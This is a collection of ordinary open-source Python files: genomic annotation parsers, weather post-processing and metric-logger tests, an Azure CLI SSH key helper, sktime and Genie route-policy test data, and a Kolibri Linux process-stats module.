ccds_fh = open(ccds_fn)
ccds_fh.readline()
cnt = 0
for line in ccds_fh:
fields = line.strip().split('\t')
if fields[5] != 'Public':
continue
gene_name = fields[2].upper()
if gene_name not in name2gene:
name2gene[gene_name] = Gene(name=gene_name)
g = name2gene[gene_name]
t = Transcript()
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.cds_beg = int(fields[7])+1
t.cds_end = int(fields[8])+1
# without UTR information, take CDS boundary as the exon boundary
t.beg = t.cds_beg
t.end = t.cds_end
t.name = fields[4]
# note that CCDS do not annotate UTR, so all the exons are equivalently cds
t.exons = [(int(b)+1, int(e)+1) for b,e in re.findall(r"[\s\[](\d+)-(\d+)[,\]]", fields[9])]
t.source = 'CDDS'
t.gene = g
g.tpts.append(t)
cnt += 1
err_print("loaded %d transcripts from CCDS table." % cnt)
def parse_ucsc_kg_table(kg_fn, alias_fn, name2gene):
kg_fh = opengz(kg_fn)
id2aliases = {}
if alias_fn:
alias_fh = opengz(alias_fn)
for line in alias_fh:
if line.startswith('#'): continue
fields = line.strip().split('\t')
if fields[0] in id2aliases:
id2aliases[fields[0]].append(fields[1])
else:
id2aliases[fields[0]] = [fields[1]]
cnt = 0
for line in kg_fh:
if line.startswith('#'): continue
fields = line.strip().split('\t')
g = None
if fields[0] in id2aliases:
for alias in id2aliases[fields[0]]:
if alias in name2gene:
g = name2gene[alias]
if not g:
g = Gene(name=fields[0])
for alias in id2aliases[fields[0]]:
name2gene[alias] = g
else:
if fields[0] in name2gene:
g = name2gene[fields[0]]
else:
g = Gene(name=fields[0])
name2gene[fields[0]] = g
t = Transcript()
t.name = fields[0]
t.chrm = normalize_chrm(fields[1])
t.strand = fields[2]
t.beg = int(fields[3])
t.end = int(fields[4])
t.cds_beg = int(fields[5])
t.cds_end = int(fields[6])
t.source = 'UCSC_knownGene'
ex_begs, ex_ends = fields[8], fields[9]
for ex_beg, ex_end in zip(list(map(int, ex_begs.strip(',').split(','))),
list(map(int, ex_ends.strip(',').split(',')))):
t.exons.append((ex_beg, ex_end))
t.exons.sort()
g.tpts.append(t)
t.gene = g
cnt += 1
err_print("loaded %d transcripts from UCSC knownGene table." % cnt)
def parse_gencode_gtf(gencode_fn, name2gene):
id2ent = {}
gencode_fh = opengz(gencode_fn)
cnt = 0
for line in gencode_fh:
# if cnt > 1000:
# break
if line.startswith('#'): continue
fields = line.strip().split('\t')
info = dict(re.findall(r'\s*([^"]*) "([^"]*)";', fields[8]))
if fields[2] == 'gene':
gene_name = info['gene_name'].upper()
gid = info['gene_id']
if gene_name in name2gene:
g = name2gene[gene_name]
id2ent[gid] = g
else:
if gid not in id2ent:
id2ent[gid] = Gene(name=gene_name, gene_type=info['gene_type'])
g = id2ent[gid]
name2gene[gene_name] = g
g.beg = int(fields[3])
g.end = int(fields[4])
# if info['gene_type'] == 'pseudogene':
# g.pseudo = True
elif fields[2] == 'transcript':
tid = info['transcript_id']
if tid not in id2ent:
id2ent[tid] = Transcript(transcript_type=info['transcript_type'])
t = id2ent[tid]
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.beg = int(fields[3])
t.end = int(fields[4])
t.name = tid
gid = info['gene_id']
if gid not in id2ent:
id2ent[gid] = Gene(gene_type=info['gene_type'])
t.gene = id2ent[gid]
t.gene.tpts.append(t)
t.source = 'GENCODE'
id2ent[t.name] = t
cnt += 1
elif fields[2] == 'exon':
tid = info['transcript_id']
if tid not in id2ent:
id2ent[tid] = Transcript(transcript_type=info['transcript_type'])
t = id2ent[tid]
t.exons.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'CDS':
tid = info['transcript_id']
if tid not in id2ent:
id2ent[tid] = Transcript(transcript_type=info['transcript_type'])
t = id2ent[tid]
t.cds.append((int(fields[3]), int(fields[4])))
err_print("loaded %d transcripts from GENCODE GTF file." % cnt)
def parse_aceview_transcripts(aceview_gff_fn, name2gene):
id2tpt = {}
aceview_fh = opengz(aceview_gff_fn)
for line in aceview_fh:
if line.startswith('#'): continue
fields = line.strip().split('\t')
if len(fields) < 9: continue # the old transcript definition (hg18) from AceView is a bit corrupted.
info = dict(re.findall(r'\s*(\S+) (\S+);', fields[8]))
if fields[2] == 'CDS':
gene_name = info['gene_id'].upper()
if gene_name in name2gene:
g = name2gene[gene_name]
else:
g = Gene(name=gene_name)
name2gene[gene_name] = g
if info['transcript_id'] in id2tpt:
t = id2tpt[info['transcript_id']]
else:
t = Transcript()
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.name = info['transcript_id']
id2tpt[t.name] = t
t.gene = g
g.tpts.append(t)
t.source = 'AceView'
t.cds.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'exon':
gene_name = info['gene_id'].upper()
if gene_name in name2gene:
g = name2gene[gene_name]
else:
g = Gene(name=gene_name)
name2gene[gene_name] = g
if info['transcript_id'] in id2tpt:
t = id2tpt[info['transcript_id']]
else:
t = Transcript()
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.name = info['transcript_id']
id2tpt[t.name] = t
t.gene = g
g.tpts.append(t)
t.source = 'AceView'
t.exons.append((int(fields[3]), int(fields[4])))
# skip transcripts without CDS, e.g., LOC391566.aAug10-unspliced
for tid, t in id2tpt.items():
if t.cds and t.exons:
t.exons.sort()
t.beg = t.exons[0][0]
t.end = t.exons[-1][1]
else:
t.gene.tpts.remove(t)
err_print("loaded %d transcripts from AceView GFF file." % len(id2tpt))
def parse_uniprot_mapping(fn):
tid2uniprot = {}
for line in opengz(fn):
fields = line.strip().split('\t')
if fields[2] != fields[0]:
# tid2uniprot[fields[2]] = fields[0]
if fields[0] in tid2uniprot:
tid2uniprot[fields[0]].append(fields[2])
else:
tid2uniprot[fields[0]] = [fields[2]]
err_print('loaded %d transcript with UniProt mapping.' % len(tid2uniprot))
return tid2uniprot
# def parse_annotation(args):
# name2gene = {}
# if args.ensembl:
# if args.refversion in ['hg18']:
# parse_ensembl_gtf_hg18(args.ensembl, name2gene)
# else:
# parse_ensembl_gtf(args.ensembl, name2gene)
# if args.refseq:
# parse_refseq_gff(args.refseq, name2gene)
# if args.ccds:
# parse_ccds_table(args.ccds, name2gene)
# if args.gencode:
# parse_gencode_gtf(args.gencode, name2gene)
# # try:
# # import pysam
# # args.ffhs['GENCODE'] = pysam.Tabixfile(args.gencode)
# # except:
# # err_print("Cannot import non-coding features (may need pysam).")
# if args.ucsc:
# parse_ucsc_refgene(args.ucsc, name2gene)
# # if args.custom:
# # parse_ucsc_refgene_customized(args.custom, name2gene)
# if args.kg:
# parse_ucsc_kg_table(args.kg, args.alias, name2gene)
# if args.aceview:
# parse_aceview_transcripts(args.aceview, name2gene)
# # remove genes without transcripts
# names_no_tpts = []
# for name, gene in name2gene.items():
# # print gene, len(gene.tpts)
# if not gene.tpts:
# names_no_tpts.append(name)
# for name in names_no_tpts:
# del name2gene[name]
# err_print('loaded %d genes.' % len(name2gene))
# # index transcripts in a gene
# thash = THash()
# genes = set(name2gene.values())
# for g in genes:
# for t in g.tpts:
# t.exons.sort()
# if not (hasattr(t, 'cds_beg') and hasattr(t, 'cds_end')):
# if t.cds:
# t.cds.sort()
# t.cds_beg = t.cds[0][0]
# t.cds_end = t.cds[-1][1]
# elif hasattr(t,'beg') and hasattr(t,'end'):
# t.cds_beg = t.beg
# t.cds_end = t.end
# else:
# t.cds_beg = t.exons[0][0]
# t.cds_end = t.exons[-1][1]
# thash.insert(t)
# if len(t.exons) == 0: # if no exon, use cds
# t.exons = t.cds[:]
# g.std_tpt = g.longest_tpt()
# if args.uniprot:
# tid2uniprot = parse_uniprot_mapping(args.uniprot)
# name2protein = {}
# for name, gene in name2gene.items():
# for tpt in gene.tpts:
# if tpt.name in tid2uniprot:
# uniprot = tid2uniprot[tpt.name]
# if uniprot not in name2protein:
# name2protein[uniprot] = Gene(uniprot)
# prot = name2protein[uniprot]
# prot.tpts.append(tpt)
# return name2protein, thash
# else:
# return name2gene, thash
| blob_id: 8100129a2ce5842d9423399fcc8273b3032faa8f | repo: metoppv/improver | path: /improver_tests/precipitation_type/hail_fraction/test_HailFraction.py | licenses: BSD-3-Clause, LicenseRef-scancode-proprietary-license (permissive) | branch: refs/heads/master | revision_date: 2023-08-25T13:57:20 | language: Python | encoding: UTF-8 | length_bytes: 7,280 | filename: test_HailFraction.py |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown copyright. The Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Tests for the HailFraction plugin."""
import iris
import numpy as np
import pytest
from improver.precipitation_type.hail_fraction import HailFraction
from improver.synthetic_data.set_up_test_cubes import set_up_variable_cube
COMMON_ATTRS = {
"source": "Unit test",
"institution": "Met Office",
"title": "Post-Processed IMPROVER unit test",
}
def setup_cubes():
"""Set up cubes for testing."""
vertical_updraught_data = np.zeros((2, 2), dtype=np.float32)
vertical_updraught = set_up_variable_cube(
vertical_updraught_data,
"maximum_vertical_updraught",
"m s-1",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
hail_size_data = np.zeros((2, 2), dtype=np.float32)
hail_size = set_up_variable_cube(
hail_size_data,
"size_of_hail_stones",
"m",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
cloud_condensation_level_data = np.zeros((2, 2), dtype=np.float32)
cloud_condensation_level = set_up_variable_cube(
cloud_condensation_level_data,
"air_temperature_at_condensation_level",
"K",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
convective_cloud_top_data = np.zeros((2, 2), dtype=np.float32)
convective_cloud_top = set_up_variable_cube(
convective_cloud_top_data,
"air_temperature_at_convective_cloud_top",
"K",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
hail_melting_level_data = np.zeros((2, 2), dtype=np.float32)
hail_melting_level = set_up_variable_cube(
hail_melting_level_data,
"altitude_of_rain_from_hail_falling_level",
"m",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
altitude_data = np.zeros((2, 2), dtype=np.float32)
altitude = set_up_variable_cube(
altitude_data,
"altitude",
"m",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
return (
vertical_updraught,
hail_size,
cloud_condensation_level,
convective_cloud_top,
hail_melting_level,
altitude,
)
@pytest.mark.parametrize("model_id_attr", (None, "mosg__model_configuration"))
@pytest.mark.parametrize(
"vertical_updraught_value,hail_size_value,cloud_condensation_level_value,"
+ "convective_cloud_top_value,hail_melting_level_value,altitude_value,expected",
(
# No indications of hail
(1, 0.0, 263.15, 261.15, 100, 50, 0),
# Larger updraught, no other indications of hail
(25, 0.001, 263.15, 261.15, 100, 50, 0),
# Low vertical updraught prevents hail
(5, 0.001, 271.15, 253.15, 20, 50, 0),
# Sufficient vertical updraught, non-zero hail fraction
(25, 0.001, 271.15, 253.15, 20, 50, 1 / 9),
# Sufficient vertical updraught, non-zero hail fraction
(50, 0.001, 271.15, 253.15, 20, 50, 0.25),
# Large vertical updraught, non-zero hail fraction
(75, 0.001, 271.15, 253.15, 20, 50, 0.25),
# Hail size indicates non-zero hail fraction
(1, 0.003, 271.15, 253.15, 20, 50, 0.05),
# Cloud condensation level temperature prevents hail
(75, 0.001, 263.15, 253.15, 20, 50, 0),
# Convective cloud top temperature prevents hail
(75, 0.001, 271.15, 263.15, 20, 50, 0),
# Hail melting level prevents hail
(75, 0.001, 271.15, 253.15, 100, 50, 0),
# Hail size causes non-zero hail fraction despite inhibitive cloud condensation
# level temperature, convective cloud top temperature and hail melting level
(1, 0.003, 263.15, 263.15, 100, 50, 0.05),
),
)
def test_basic(
vertical_updraught_value,
hail_size_value,
cloud_condensation_level_value,
convective_cloud_top_value,
hail_melting_level_value,
altitude_value,
expected,
model_id_attr,
):
"""Test hail fraction plugin."""
expected_attributes = COMMON_ATTRS.copy()
if model_id_attr:
expected_attributes[model_id_attr] = setup_cubes()[0].attributes[model_id_attr]
(
vertical_updraught,
hail_size,
cloud_condensation_level,
convective_cloud_top,
hail_melting_level,
altitude,
) = setup_cubes()
vertical_updraught.data = np.full_like(
vertical_updraught.data, vertical_updraught_value
)
hail_size.data = np.full_like(hail_size.data, hail_size_value)
cloud_condensation_level.data = np.full_like(
cloud_condensation_level.data, cloud_condensation_level_value,
)
convective_cloud_top.data = np.full_like(
convective_cloud_top.data, convective_cloud_top_value,
)
hail_melting_level.data = np.full_like(
hail_melting_level.data, hail_melting_level_value
)
altitude.data = np.full_like(altitude.data, altitude_value)
result = HailFraction(model_id_attr=model_id_attr)(
vertical_updraught,
hail_size,
cloud_condensation_level,
convective_cloud_top,
hail_melting_level,
altitude,
)
assert isinstance(result, iris.cube.Cube)
assert str(result.units) == "1"
assert result.name() == "hail_fraction"
assert result.attributes == expected_attributes
np.testing.assert_allclose(result.data, expected)
| blob_id: 9cf6a3d42c9b1303b6c6acf68313d6e5642e4962 | repo: Azure/azure-cli | path: /src/azure-cli/azure/cli/command_modules/vm/manual/custom.py | licenses: MIT, BSD-3-Clause, LGPL-2.0-or-later, GPL-1.0-or-later, MPL-2.0, LGPL-2.1-only, Apache-2.0, LGPL-2.1-or-later, BSD-2-Clause (permissive) | branch: refs/heads/dev | revision_date: 2023-08-17T06:00:10 | language: Python | encoding: UTF-8 | length_bytes: 2,278 | filename: custom.py |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.log import get_logger
logger = get_logger(__name__)
def sshkey_create(client,
resource_group_name,
ssh_public_key_name,
location,
tags=None,
public_key=None):
import time
from pathlib import Path
parameters = {
'location': location,
'tags': tags,
'public_key': public_key
}
client.create(resource_group_name=resource_group_name,
ssh_public_key_name=ssh_public_key_name,
parameters=parameters)
if public_key is None: # Generate one if public key is None
logger.warning('No public key is provided. A key pair is being generated for you.')
key_pair = client.generate_key_pair(
resource_group_name=resource_group_name, ssh_public_key_name=ssh_public_key_name)
# Save keys to local files
private_key = key_pair.private_key
public_key = key_pair.public_key
sshpath = Path.home().joinpath('.ssh')
# Create ~/.ssh if it does not exist
if not sshpath.exists():
sshpath.mkdir()
# File path
private_key_file = str(sshpath.joinpath(str(time.time()).replace('.', '_')))
public_key_file = private_key_file + '.pub'
# Write to files
with open(private_key_file, 'w', newline='\n') as f:
f.write(private_key)
logger.warning('Private key is saved to "%s".', private_key_file)
with open(public_key_file, 'w', newline='\n') as f:
f.write(public_key)
logger.warning('Public key is saved to "%s".', public_key_file)
return client.get(resource_group_name=resource_group_name,
ssh_public_key_name=ssh_public_key_name)
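A minimal sketch of calling sshkey_create directly; ssh_keys_client stands in for the SSH public keys operations client that the CLI framework normally injects, and the resource names are placeholders.
key = sshkey_create(ssh_keys_client,                     # hypothetical; injected by the CLI at runtime
                    resource_group_name='my-rg',
                    ssh_public_key_name='my-key',
                    location='westus2')
print(key.public_key)                                    # assumes the returned resource model exposes public_key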
| blob_id: 6790aa64d0d5c99e0405168728d8c7e2ddc8439a | repo: sktime/sktime | path: /sktime/regression/interval_based/__init__.py | licenses: BSD-3-Clause (permissive) | branch: refs/heads/main | revision_date: 2023-08-22T15:24:39 | language: Python | encoding: UTF-8 | length_bytes: 235 | filename: __init__.py |
#!/usr/bin/env python3 -u
"""Implement interval based time series regression estimators."""
__author__ = ["mloning"]
__all__ = ["TimeSeriesForestRegressor"]
from sktime.regression.interval_based._tsf import TimeSeriesForestRegressor
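A small, illustrative fit/predict sketch for the exported estimator; the 3D numpy panel shape (n_instances, n_columns, n_timepoints) and the hyperparameter value are assumptions, not part of this module.
import numpy as np
from sktime.regression.interval_based import TimeSeriesForestRegressor

X = np.random.default_rng(0).normal(size=(20, 1, 50))   # 20 univariate series of length 50
y = np.random.default_rng(1).normal(size=20)
reg = TimeSeriesForestRegressor(n_estimators=10)
reg.fit(X, y)
print(reg.predict(X[:3]).shape)                          # (3,)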
| blob_id: e5da547a20e7ecef06da556fac6d2946578f4b24 | repo: KaihuaTang/Scene-Graph-Benchmark.pytorch | path: /tests/test_metric_logger.py | licenses: Python-2.0, MIT (permissive) | branch: refs/heads/master | revision_date: 2022-07-29T06:16:23 | language: Python | encoding: UTF-8 | length_bytes: 789 | filename: test_metric_logger.py |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import unittest
from maskrcnn_benchmark.utils.metric_logger import MetricLogger
class TestMetricLogger(unittest.TestCase):
def test_update(self):
meter = MetricLogger()
for i in range(10):
meter.update(metric=float(i))
m = meter.meters["metric"]
self.assertEqual(m.count, 10)
self.assertEqual(m.total, 45)
self.assertEqual(m.median, 4)
self.assertEqual(m.avg, 4.5)
def test_no_attr(self):
meter = MetricLogger()
_ = meter.meters
_ = meter.delimiter
def broken():
_ = meter.not_existent
self.assertRaises(AttributeError, broken)
if __name__ == "__main__":
unittest.main()
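As a quick check on the expectations in test_update: the ten updates are the values 0 through 9, so count = 10, total = 0 + 1 + ... + 9 = 45 and avg = 45 / 10 = 4.5; the asserted median of 4 corresponds to taking the lower of the two middle values of the even-length window, which is presumably how the underlying meter computes it.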
| blob_id: a8e76955a12ee407cb121f7a519f41ce6ce2f16a | repo: CiscoTestAutomation/genielibs | path: /pkgs/ops-pkg/src/genie/libs/ops/route_policy/iosxr/tests/route_policy_output.py | licenses: Apache-2.0 (permissive) | branch: refs/heads/master | revision_date: 2023-07-27T17:58:42 | language: Python | encoding: UTF-8 | length_bytes: 15,150 | filename: route_policy_output.py |
'''
RoutePolicy Genie Ops Object Outputs for IOSXR.
'''
class RoutePolicyOutput(object):
showRplRoutePolicy = {'NO-EXPORT':
{'description': 'test15',
'statements':
{10:
{'actions':
{'actions': 'pass',
'set_community_list': 'no-export'},
'conditions':
{'match_prefix_list': 'NO-EXPORT'}}}},
'all-pass':
{'statements':
{1:
{'actions': {'actions': 'pass'},
'conditions': {}}}},
'allpass':
{'statements':
{10:
{'actions': {'actions': 'pass'},
'conditions': {}}}},
'as-path':
{'statements':
{10: {'actions': {},
'conditions': {}}}},
'aspath':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_as_path_list': 'test'}},
20:
{'actions': {'actions': 'drop'},
'conditions': {}}}},
'test':
{'statements':
{10:
{'actions':
{'set_route_origin': 'incomplete'},
'conditions':
{'match_local_pref_eq': '123'}},
20:
{'actions': {'set_weight': '44'},
'conditions': {'match_med_eq': 100}},
1:
{'actions':
{'set_route_origin': 'incomplete'},
'conditions': {}}}},
'test-community':
{'statements':
{10:
{'actions':
{'set_community': ['100:1','200:1','300:1'],
'set_community_no_advertise': True,
'set_community_no_export': True},
'conditions': {}},
20:
{'actions':
{'set_community': ['111:1','222:1'],
'set_community_additive': True,
'set_community_no_advertise': True,
'set_ext_community_rt': ['100:1','200:1'],
'set_ext_community_rt_additive': True},
'conditions': {}}}},
'test2':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions': {'match_origin_eq': 'eg'}},
20:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_nexthop_in': 'prefix-set'}},
30:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_local_pref_eq': '13'}}}},
'test3':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions': {}},
20:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_area_eq': '1'}},
30:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_prefix_list': 'prefix-set'}},
40:
{'actions':
{'actions': 'pass'},
'conditions': {}},
50: {'actions':
{'set_as_path_prepend': 100,
'set_as_path_prepend_repeat_n': 10,
'set_community': ['100:100'],
'set_community_additive': True,
'set_community_delete': 'test',
'set_community_list': 'test',
'set_community_no_advertise': True,
'set_community_no_export': True,
'set_ext_community_delete': 'test',
'set_ext_community_rt': ['300:1','300:2'],
'set_ext_community_rt_additive': True,
'set_ext_community_soo': '100:100',
'set_ext_community_soo_additive': True,
'set_level': 'level-1-2',
'set_local_pref': 100,
'set_med': 113,
'set_metric': '100',
'set_metric_type': 'type-2',
'set_next_hop': '10.4.1.1',
'set_ospf_metric': '100',
'set_route_origin': 'egp',
'set_tag': '111'},
'conditions': {}}}},
'testtest':
{'statements':
{10:
{'actions':
{'set_local_pref': 120,
'set_med': 111,
'set_metric_type': 'type-1',
'set_next_hop': '192.168.1.1'},
'conditions': {'match_med_eq': 10}
}
}
}
}
RoutePolicy = {'info':
{'NO-EXPORT':
{'description': 'test15',
'statements':
{10:
{'actions':
{'actions': 'pass',
'set_community_list': 'no-export'},
'conditions':
{'match_prefix_list': 'NO-EXPORT'}}}},
'all-pass':
{'statements':
{1:
{'actions': {'actions': 'pass'},
'conditions': {}}}},
'allpass':
{'statements':
{10:
{'actions': {'actions': 'pass'},
'conditions': {}}}},
'as-path':
{'statements':
{10: {'actions': {},
'conditions': {}}}},
'aspath':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_as_path_list': 'test'}},
20:
{'actions': {'actions': 'drop'},
'conditions': {}}}},
'test':
{'statements':
{10:
{'actions':
{'set_route_origin': 'incomplete'},
'conditions':
{'match_local_pref_eq': '123'}},
20:
{'actions': {'set_weight': '44'},
'conditions': {'match_med_eq': 100}},
1:
{'actions':
{'set_route_origin': 'incomplete'},
'conditions': {}}}},
'test-community':
{'statements':
{10:
{'actions':
{'set_community': ['100:1','200:1','300:1'],
'set_community_no_advertise': True,
'set_community_no_export': True},
'conditions': {}},
20:
{'actions':
{'set_community': ['111:1','222:1'],
'set_community_additive': True,
'set_community_no_advertise': True,
'set_ext_community_rt': ['100:1','200:1'],
'set_ext_community_rt_additive': True},
'conditions': {}}}},
'test2':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions': {'match_origin_eq': 'eg'}},
20:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_nexthop_in': 'prefix-set'}},
30:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_local_pref_eq': '13'}}}},
'test3':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions': {}},
20:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_area_eq': '1'}},
30:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_prefix_list': 'prefix-set'}},
40:
{'actions':
{'actions': 'pass'},
'conditions': {}},
50: {'actions':
{'set_as_path_prepend': 100,
'set_as_path_prepend_repeat_n': 10,
'set_community': ['100:100'],
'set_community_additive': True,
'set_community_delete': 'test',
'set_community_list': 'test',
'set_community_no_advertise': True,
'set_community_no_export': True,
'set_ext_community_delete': 'test',
'set_ext_community_rt': ['300:1','300:2'],
'set_ext_community_rt_additive': True,
'set_ext_community_soo': '100:100',
'set_ext_community_soo_additive': True,
'set_level': 'level-1-2',
'set_local_pref': 100,
'set_med': 113,
'set_metric': '100',
'set_metric_type': 'type-2',
'set_next_hop': '10.4.1.1',
'set_ospf_metric': '100',
'set_route_origin': 'egp',
'set_tag': '111'},
'conditions': {}}}},
'testtest':
{'statements':
{10:
{'actions':
{'set_local_pref': 120,
'set_med': 111,
'set_metric_type': 'type-1',
'set_next_hop': '192.168.1.1'},
'conditions': {'match_med_eq': 10}
}
}
}
}
}
| blob_id: e151f2e12925d3600374d2cf0fa97780e7221baa | repo: learningequality/kolibri | path: /kolibri/utils/pskolibri/_pslinux.py | licenses: MIT (permissive) | branch: refs/heads/release-v0.16.x | revision_date: 2023-08-31T15:43:47 | language: Python | encoding: UTF-8 | length_bytes: 10,293 | filename: _pslinux.py |
"""Linux platform implementation."""
from __future__ import absolute_import
from __future__ import division
import errno
import functools
import os
import re
import sys
from collections import namedtuple
from kolibri.utils.pskolibri.common import AccessDenied
from kolibri.utils.pskolibri.common import b
from kolibri.utils.pskolibri.common import memoize
from kolibri.utils.pskolibri.common import memoize_when_activated
from kolibri.utils.pskolibri.common import NoSuchProcess
from kolibri.utils.pskolibri.common import open_binary
from kolibri.utils.pskolibri.common import open_text
from kolibri.utils.pskolibri.common import pcputimes
CLOCK_TICKS = os.sysconf("SC_CLK_TCK")
PAGESIZE = os.sysconf("SC_PAGE_SIZE")
BOOT_TIME = None # set later
svmem = namedtuple("svmem", ["total", "used"])
pmem = namedtuple("pmem", "rss vms shared text lib data dirty")
def get_procfs_path():
"""Return updated psutil.PROCFS_PATH constant."""
return sys.modules["kolibri.utils.pskolibri"].PROCFS_PATH
@memoize
def set_scputimes_ntuple(procfs_path):
"""Set a namedtuple of variable fields depending on the CPU times
available on this Linux kernel version which may be:
(user, nice, system, idle, iowait, irq, softirq, [steal, [guest,
[guest_nice]]])
Used by cpu_times() function.
"""
global scputimes
with open_binary("%s/stat" % procfs_path) as f:
values = f.readline().split()[1:]
fields = ["user", "nice", "system", "idle", "iowait", "irq", "softirq"]
vlen = len(values)
if vlen >= 8:
# Linux >= 2.6.11
fields.append("steal")
if vlen >= 9:
# Linux >= 2.6.24
fields.append("guest")
if vlen >= 10:
# Linux >= 3.2.0
fields.append("guest_nice")
scputimes = namedtuple("scputimes", fields)
def cpu_times():
"""Return a named tuple representing the following system-wide
CPU times:
(user, nice, system, idle, iowait, irq, softirq [steal, [guest,
[guest_nice]]])
Last 3 fields may not be available on all Linux kernel versions.
"""
procfs_path = get_procfs_path()
set_scputimes_ntuple(procfs_path)
with open_binary("%s/stat" % procfs_path) as f:
values = f.readline().split()
fields = values[1 : len(scputimes._fields) + 1]
fields = [float(x) / CLOCK_TICKS for x in fields]
return scputimes(*fields)
def virtual_memory():
"""Report virtual memory stats.
This implementation matches "free" and "vmstat -s" cmdline
utility values and procps-ng-3.3.12 source was used as a reference
(2016-09-18):
https://gitlab.com/procps-ng/procps/blob/
24fd2605c51fccc375ab0287cec33aa767f06718/proc/sysinfo.c
For reference, procps-ng-3.3.10 is the version available on Ubuntu
16.04.
Note about "available" memory: up until psutil 4.3 it was
calculated as "avail = (free + buffers + cached)". Now
"MemAvailable:" column (kernel 3.14) from /proc/meminfo is used as
it's more accurate.
That matches "available" column in newer versions of "free".
"""
missing_fields = []
mems = {}
with open_binary("%s/meminfo" % get_procfs_path()) as f:
for line in f:
fields = line.split()
mems[fields[0]] = int(fields[1]) * 1024
# /proc doc states that the available fields in /proc/meminfo vary
# by architecture and compile options, but these 3 values are also
# returned by sysinfo(2); as such we assume they are always there.
total = mems[b"MemTotal:"]
free = mems[b"MemFree:"]
try:
buffers = mems[b"Buffers:"]
except KeyError:
buffers = 0
missing_fields.append("buffers")
try:
cached = mems[b"Cached:"]
except KeyError:
cached = 0
missing_fields.append("cached")
else:
cached += mems.get(b"SReclaimable:", 0) # since kernel 2.6.19
used = total - free - cached - buffers
if used < 0:
# May be symptomatic of running within an LXC container where such
# values will be dramatically distorted over those of the host.
used = total - free
return svmem(total, used)
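# Worked example with illustrative numbers only: if /proc/meminfo reports MemTotal
# 8,000,000 kB, MemFree 1,000,000 kB, Buffers 200,000 kB and Cached + SReclaimable
# 3,000,000 kB, the byte values read above are total = 8192000000, free = 1024000000,
# buffers = 204800000 and cached = 3072000000, giving
# used = total - free - cached - buffers = 3891200000 bytes.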
def pids():
"""Returns a list of PIDs currently running on the system."""
return [int(x) for x in os.listdir(b(get_procfs_path())) if x.isdigit()]
def cpu_count_logical():
"""Return the number of logical CPUs in the system."""
try:
return os.sysconf("SC_NPROCESSORS_ONLN")
except ValueError:
# as a second fallback we try to parse /proc/cpuinfo
num = 0
with open_binary("%s/cpuinfo" % get_procfs_path()) as f:
for line in f:
if line.lower().startswith(b"processor"):
num += 1
# unknown format (e.g. armel/sparc architectures), see:
# https://github.com/giampaolo/psutil/issues/200
# try to parse /proc/stat as a last resort
if num == 0:
search = re.compile(r"cpu\d")
with open_text("%s/stat" % get_procfs_path()) as f:
for line in f:
line = line.split(" ")[0]
if search.match(line):
num += 1
if num == 0:
# mimic os.cpu_count()
return None
return num
def wrap_exceptions(fun):
"""Decorator which translates bare OSError and IOError exceptions
into NoSuchProcess and AccessDenied.
"""
@functools.wraps(fun)
def wrapper(self, *args, **kwargs):
try:
return fun(self, *args, **kwargs)
except EnvironmentError as err:
